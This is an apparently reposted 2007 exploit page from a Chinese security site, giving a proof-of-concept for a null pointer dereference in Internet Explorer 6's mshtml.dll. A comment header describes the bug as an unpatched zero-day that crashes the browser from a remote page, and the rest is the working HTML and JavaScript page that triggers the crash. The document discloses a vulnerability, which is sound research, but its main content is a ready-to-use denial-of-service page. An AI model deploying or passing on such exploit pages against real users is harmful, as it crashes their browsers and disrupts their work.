MS Internet Explorer 6 (mshtml.dll) Null Pointer Dereference Exploit
|
来源:amesianx@gmail.com 作者:AmesianX 发布时间:2007-02-06
|
|
<!-- + Title: Microsoft Internet Explorer Malformed HTML Null Pointer Dereference Vulnerability (mshtml.dll) (0-day)
+ Bug discovered & exploit coded by AmesianX in powerhacker.net (YoungHo Park - amesianx@gmail.com)
+ Critical: Critical + Impact: MS Internet Explorer 6 -> Crash (Denial of Service) + Where: From remote + Tested Operating System: Windows XP SP2 FULL PATCHED (Korean Language) Windows 2000 Advanced Server (Korean Language) + Tested Software: Microsoft Internet Explorer Ver.6.0.2800.1106;SP1 (Windows 2000 Advanced Server) Microsoft Internet Explorer Ver.6.0.2900.2180.xpsp.050928-1517;SP2 (Windows XP Pro) + Solution: Not Patched (zero-day) + Description: The following bug was tested on the latest version of Internet Explorer 6 on a fully-patched Windows XP SP2 system. this bug will crash when executing a 'for' scripts.
+ The following proof-of-concept is also available: http://www.powerhacker.net/exploit/IE_NULL_CRASH.html -->
<html> <head> <title> AmesianX, RC_No1 in powerhacker.net (amesianx@gmail.com, RC_No1@gmail.com)</title> </head> <body> <script language='javascript'> var data = document['getElementById']; for(var key in data); </script> </body> </html>
|
|
|
[推荐]
[评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|